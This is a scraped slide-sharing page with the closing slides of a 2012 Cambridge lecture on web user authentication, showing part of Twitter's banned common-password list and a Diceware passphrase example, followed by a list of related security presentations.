✧❜✐t❝❤❡s✧✱ ✧❜✐t❡♠❡✧✱ ✧❜❧❛③❡r✧✱ ✧❜❧♦♥❞❡✧✱ ✧❜❧♦♥❞❡s✧✱ ✧❜❧♦✇❥♦❜✧✱ ✧❜❧♦✇♠❡✧✱ ✧❜♦♥❞✵✵✼✧✱ ✧❜♦♥✐t❛✧✱ ✧❜♦♥♥✐❡✧✱ ✧❜♦♦❜♦♦✧✱ ✧❜♦♦❣❡r✧✱ ✧❜♦♦♠❡r✧✱ ✧❜♦st♦♥✧✱ ✧❜r❛♥❞♦♥✧✱ ✧❜r❛♥❞②✧✱ ✧❜r❛✈❡s✧✱ ✧❜r❛③✐❧✧✱ ✧❜r♦♥❝♦✧✱ ✧❜r♦♥❝♦s✧✱ ✧❜✉❧❧❞♦❣✧✱ ✧❜✉st❡r✧✱ ✧❜✉tt❡r✧✱ ✧❜✉tt❤❡❛❞✧✱ ✧❝❛❧✈✐♥✧✱ ✧❝❛♠❛r♦✧✱ ✧❝❛♠❡r♦♥✧✱ ✧❝❛♥❛❞❛✧✱ ✧❝❛♣t❛✐♥✧✱ ✧❝❛r❧♦s✧✱ ✧❝❛rt❡r✧✱ ✧❝❛s♣❡r✧✱ ✧❝❤❛r❧❡s✧✱ ✧❝❤❛r❧✐❡✧✱ ✧❝❤❡❡s❡✧✱ ✧❝❤❡❧s❡❛✧✱ ✧❝❤❡st❡r✧✱ ✧❝❤✐❝❛❣♦✧✱ ✧❝❤✐❝❦❡♥✧✱ ✧❝♦❝❛❝♦❧❛✧✱ ✧❝♦❢❢❡❡✧✱ ✳✳✳ ✧t❡q✉✐❡r♦✧✱ ✧t❛②❧♦r✧✱ ✧t❡♥♥✐s✧✱ ✧t❡r❡s❛✧✱ ✧t❡st❡r✧✱ ✧t❡st✐♥❣✧✱ ✧t❤❡♠❛♥✧✱ ✧t❤♦♠❛s✧✱ ✧t❤✉♥❞❡r✧✱ ✧t❤①✶✶✸✽✧✱ ✧t✐❢❢❛♥②✧✱ ✧t✐❣❡rs✧✱ ✧t✐❣❣❡r✧✱ ✧t♦♠❝❛t✧✱ ✧t♦♣❣✉♥✧✱ ✧t♦②♦t❛✧✱ ✧tr❛✈✐s✧✱ ✧tr♦✉❜❧❡✧✱ ✧tr✉st♥♦✶✧✱ ✧t✉❝❦❡r✧✱ ✧t✉rt❧❡✧✱ ✧t✇✐tt❡r✧✱ ✧✉♥✐t❡❞✧✱ ✧✈❛❣✐♥❛✧✱ ✧✈✐❝t♦r✧✱ ✧✈✐❝t♦r✐❛✧✱ ✧✈✐❦✐♥❣✧✱ ✧✈♦♦❞♦♦✧✱ ✧✈♦②❛❣❡r✧✱ ✧✇❛❧t❡r✧✱ ✧✇❛rr✐♦r✧✱ ✧✇❡❧❝♦♠❡✧✱ ✧✇❤❛t❡✈❡r✧✱ ✧✇✐❧❧✐❛♠✧✱ ✧✇✐❧❧✐❡✧✱ ✧✇✐❧s♦♥✧✱ ✧✇✐♥♥❡r✧✱ ✧✇✐♥st♦♥✧✱ ✧✇✐♥t❡r✧✱ ✧✇✐③❛r❞✧✱ ✧①❛✈✐❡r✧✱ ✧①①①①①①✧✱ ✧①①①①①①①①✧✱ ✧②❛♠❛❤❛✧✱ ✧②❛♥❦❡❡✧✱ ✧②❛♥❦❡❡s✧✱ ✧②❡❧❧♦✇✧✱ ✧③①❝✈❜♥✧✱ ✧③①❝✈❜♥♠✧✱ ✧③③③③③③✧❪❀ Twitter banned password list Mitigates: Password guessing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

  75. Better password choices ❞✐❝❡✇❛r❡ ✶✻✻✻✺✶✺✻✺✸✶✺✻✺✸✺✻✸✷✷✸✺✻✶✻✻✺✷✷✹ ✶ ✻ ✻ ✻ ✺ ❝❧❡❢t ✶ ✺ ✻ ✺ ✸ ❝❛♠ ✺ ✻ ✸ ✷ ✷ s②♥♦❞ ✸ ✺ ✻ ✶ ✻ ❧❛❝② ✻ ✺ ✷ ✷ ✹ ②r ♣❛ss✇♦r❞ ❂ ❝❧❡❢t❝❛♠s②♥♦❞❧❛❝②②r Diceware Mitigates: Password guessing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR CONSULTANTS www.XFactorConsultants.com User Authentication (Auth) The methods by which a web app verifies the identity of a user and limits their

334 views • 8 slides
Information Security Identification and authentication Advanced User Authentication I 2019-02-01

Information Security Identification and authentication Advanced User Authentication I 2019-02-01

Information Security Identification and authentication Advanced User Authentication I 2019-02-01 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

573 views • 32 slides
Information Security Identification and authentication Advanced User Authentication I 2018-02-02

Information Security Identification and authentication Advanced User Authentication I 2018-02-02

Information Security Identification and authentication Advanced User Authentication I 2018-02-02 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

568 views • 41 slides
Information Security Identification and authentication Advanced User Authentication I 2016-01-26

Information Security Identification and authentication Advanced User Authentication I 2016-01-26

Information Security Identification and authentication Advanced User Authentication I 2016-01-26 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

865 views • 40 slides
User Authentication Passport Jason Situ Passport What is it? Passport is authentication

User Authentication Passport Jason Situ Passport What is it? Passport is authentication

User Authentication Passport Jason Situ Passport What is it? Passport is authentication middleware for Node. It is designed to serve a singular purpose: authenticate requests. Supports a comprehensive set of authentication mechanisms called

808 views • 16 slides
USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we

USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we

USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we have (tokens) What we are (iris, fingerprint) [Accuracy vs. cost trade-off] Other USER AUTHENTICATION INKBLOT AUTHENTICATION Come up with

671 views • 20 slides
Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II 2016-01-29 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background Authentication eID

683 views • 44 slides
Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II 2019-02-08 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background Authentication eID

1.19k views • 102 slides
Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this

Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this

5/25/2019 Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this Lecture 5/25/2019 Password Topic 3: User Authentication Password strength Salt_(cryptography) Password cracking

1.03k views • 75 slides
Information Security Identification and authentication Advanced User Authentication III

Information Security Identification and authentication Advanced User Authentication III

Information Security Identification and authentication Advanced User Authentication III 2016-02-02 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture II within this part of the course Background Statistics Statistics in user

1.49k views • 70 slides
Information Security Identification and authentication Advanced User Authentication II and III

Information Security Identification and authentication Advanced User Authentication II and III

Information Security Identification and authentication Advanced User Authentication II and III (somewhat abbreviated ) 2018-02-09 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background

1.24k views • 106 slides
User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

ITS335 User Authentication Authentication Passwords User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens Biometrics Sirindhorn International Institute of Technology Summary Thammasat University Prepared

663 views • 40 slides
TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication

TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication

TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication After the Handshake The user navigates to the sites landing page, no client authentication required. Eventually, the user requests a

69 views • 6 slides
ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User Authentication Authentication process Means of authentication Passwords Vulnerabilities of passwords Password Cracking Dictionary Attacks

471 views • 21 slides
Authentication Authentication Overview Registration User sends username and password

Authentication Authentication Overview Registration User sends username and password

Authentication Authentication Overview Registration User sends username and password Validate password strength Store salted hash of the password Authentication User sends username/password Retrieve the stored salted

359 views • 20 slides
A2: Broken Authentication and Session Management But first Authentication, Authorization,

A2: Broken Authentication and Session Management But first Authentication, Authorization,

A2: Broken Authentication and Session Management But first Authentication, Authorization, Sessions Authentication Determining user identity Multiple ways What you know (password) What you have (phone, RSA SecureID, Yubikey)

1.57k views • 28 slides
Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user

Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user

Browser Security Part 2 Recap XSS 3 different types Common aim/theme Steal user credentials (session ID, cookies, etc.) CSRF Cross-Site Request Forgery is an attack that forces an end user to execute unwanted actions on a

428 views • 23 slides
Reining in the Web with Content Security Policy Sid Stamm Brandon Sterne Gervase Markham

Reining in the Web with Content Security Policy Sid Stamm Brandon Sterne Gervase Markham

Reining in the Web with Content Security Policy Sid Stamm Brandon Sterne Gervase Markham Mozilla Mash-ups Anyone? But how do I stop malicious content? Content Injection DOM attacks and Defacement XSS All your page is belong to us!

605 views • 37 slides
About me Trevor Bryant Security minded DevOps nerd Knight of NIST Auditor,

About me Trevor Bryant Security minded DevOps nerd Knight of NIST Auditor,

About me Trevor Bryant Security minded DevOps nerd Knight of NIST Auditor, Analyst, Engineer, Architect Tech policy Instructor @DC_TOOOL Conference Organizer / Volunteer apporima.com @apporima api_security I

204 views • 17 slides
Project INfrastructures for the Future Internet commuNITY Erik Rodenbach COST Exploratory

Project INfrastructures for the Future Internet commuNITY Erik Rodenbach COST Exploratory

Introduction to the Infinity Project INfrastructures for the Future Internet commuNITY Erik Rodenbach COST Exploratory Workshop on Smart Cities , 26 -27 Sep 2011, Paris Background and Overview of FI-PPP Supporting programmes that accelerate

183 views • 17 slides
Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security Information Systems Course Business Course site: https://67327.cmuis.net Schedule Reading Assignments in-class labs -- laptops w/ 272

1.31k views • 11 slides
Search Snippet Evaluation Mikhail Lebedev, Pavel Braslavski, Denis Savenkov CLEF 2011 CLEF 2011

Search Snippet Evaluation Mikhail Lebedev, Pavel Braslavski, Denis Savenkov CLEF 2011 CLEF 2011

Search Snippet Evaluation Mikhail Lebedev, Pavel Braslavski, Denis Savenkov CLEF 2011 CLEF 2011 What is a snippet What is a snippet # Why is it so important Why is it so important Search is ranking & representation Bad snippets spoil good

359 views • 19 slides
Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020

Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020

Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 How Bad is Bad? Weve seen many vulnerabilities Many of them can do catastrophic

541 views • 35 slides
Build Better Products with HYPOTHESIS TRACKER KALPESH SHAH KSHAH@INTRAEDGE.COM Kalpesh Shah

Build Better Products with HYPOTHESIS TRACKER KALPESH SHAH KSHAH@INTRAEDGE.COM Kalpesh Shah

Build Better Products with HYPOTHESIS TRACKER KALPESH SHAH KSHAH@INTRAEDGE.COM Kalpesh Shah Digital Product Coach, Speaker and Trainer Director of Agile/Digital Transformation at IntraEdge. Working with clients ranging from Fortune 50

275 views • 24 slides

More recommend